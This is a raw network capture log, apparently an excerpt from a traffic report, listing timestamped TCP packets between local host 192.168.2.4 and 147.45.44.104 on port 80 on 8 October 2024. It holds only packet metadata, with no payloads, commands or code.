                                                  Oct 8, 2024 03:30:55.847071886 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.847105026 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.934293032 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.934314966 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.934331894 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.934457064 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.934467077 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.934473038 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.934489012 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.934501886 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.934508085 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.934534073 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.934875965 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.934917927 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.934936047 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.934936047 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.934952974 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.934969902 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.934987068 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.935028076 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.935059071 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.935075998 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.935091019 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.935105085 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.935117960 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.935137033 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.935156107 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.935175896 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.935179949 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.935201883 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.935213089 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.935220003 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.935237885 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.935250044 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.935266018 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.935280085 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.935282946 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.935307026 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.935321093 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.935326099 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.935343027 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.935362101 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.935370922 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.935429096 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.936131954 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.936156988 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.936173916 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.936189890 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.936206102 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.936209917 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.936232090 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.936232090 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.936249018 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.936264038 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.936280012 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.936280012 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.936295033 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.936301947 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.936311960 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.936328888 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.936336040 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.936346054 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.936373949 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.936379910 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.936398029 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.936413050 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.936420918 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.936429977 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.936448097 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.936455011 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.936500072 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.936533928 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.936551094 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.936577082 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.936590910 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.936593056 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.936609030 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.936630964 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.936638117 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.936650991 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.936666012 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.936674118 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.936682940 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.936697960 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.936712027 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.936716080 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.936736107 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.936917067 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.936933041 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.936948061 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.936965942 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.936968088 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.936983109 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.936992884 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.937000990 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937017918 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937032938 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937033892 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.937041998 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937061071 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937077999 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937093019 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937110901 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937128067 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.937150002 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.937166929 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.937190056 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937206030 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937221050 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937237024 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937252998 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937253952 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.937261105 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937280893 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937300920 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.937320948 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.937323093 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937339067 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937361002 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937369108 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.937391996 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937398911 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.937410116 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937426090 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937443018 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937455893 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.937479973 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.937565088 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937581062 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937597990 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937613964 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937630892 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.937634945 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937658072 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937664986 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.937709093 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.937747002 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937764883 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937782049 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937798977 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937804937 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.937813044 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937830925 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937839031 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.937848091 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937870026 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937875032 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.937891960 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937907934 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937913895 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.937927961 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.937947035 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.938050985 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.938067913 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.938083887 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.938093901 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.938101053 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.938117981 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.938123941 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.938136101 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.938152075 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.938165903 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.938169956 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.938186884 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.938189030 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.938204050 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.938225031 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.938232899 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.938271046 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.024856091 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.024902105 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.024919033 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.024934053 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.024949074 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.024964094 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.024979115 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.024996042 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.025193930 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.025193930 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.025394917 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.025440931 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.025454998 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.025481939 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.025496960 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.025526047 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.025542974 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.025557995 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.025574923 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.025587082 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.025614977 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.025631905 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.025648117 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.025664091 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.025681019 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.025697947 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.025705099 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.025705099 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.025705099 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.025705099 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.025705099 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.025705099 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.025743008 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.025782108 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.025782108 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.025841951 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.025856018 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.025873899 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.026026964 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.026026964 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.026148081 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.026184082 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.026201010 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.026216984 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.026236057 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.026236057 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.026252985 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.026263952 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.026295900 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.026312113 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.026328087 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.026329041 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.026346922 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.026365042 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.026370049 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.026381969 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.026392937 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.026427984 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.026627064 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.026654959 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.026669979 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.026702881 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.026721954 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.026738882 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.026761055 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.026771069 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.026778936 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.026797056 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.026819944 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.026828051 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.026839972 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.026854038 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.026871920 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.026887894 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.026905060 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.026911974 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.026931047 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.026931047 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.026968956 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.026979923 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.026988029 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027008057 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027024984 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027029991 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.027111053 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027127028 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.027128935 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027147055 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027162075 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027179003 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027195930 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027205944 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027214050 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.027214050 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.027221918 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027230978 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027245998 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027245998 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.027281046 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.027281046 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.027365923 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027393103 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027414083 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027429104 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027441025 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.027443886 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027462006 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.027502060 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027519941 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027540922 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.027545929 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027563095 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027579069 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027580976 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.027595043 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027614117 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027615070 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.027643919 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027647972 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.027671099 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027688026 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027703047 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027719975 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027735949 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027738094 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.027738094 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.027770996 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.027802944 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027818918 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027833939 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027849913 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027858019 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.027868032 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027884960 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.027971983 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.027988911 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.028004885 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.028034925 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.028026104 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.028053999 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.028069019 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.028086901 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.028098106 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.028098106 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.028103113 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.028120041 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.028120995 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.028139114 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.028155088 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.028160095 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.028182030 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.028201103 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.028208971 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.028211117 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.028264046 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.028315067 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.028332949 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.028347969 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.028361082 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.028366089 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.028383017 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.028383970 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.028400898 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.028419018 CEST8049730147.45.44.104192.168.2.4
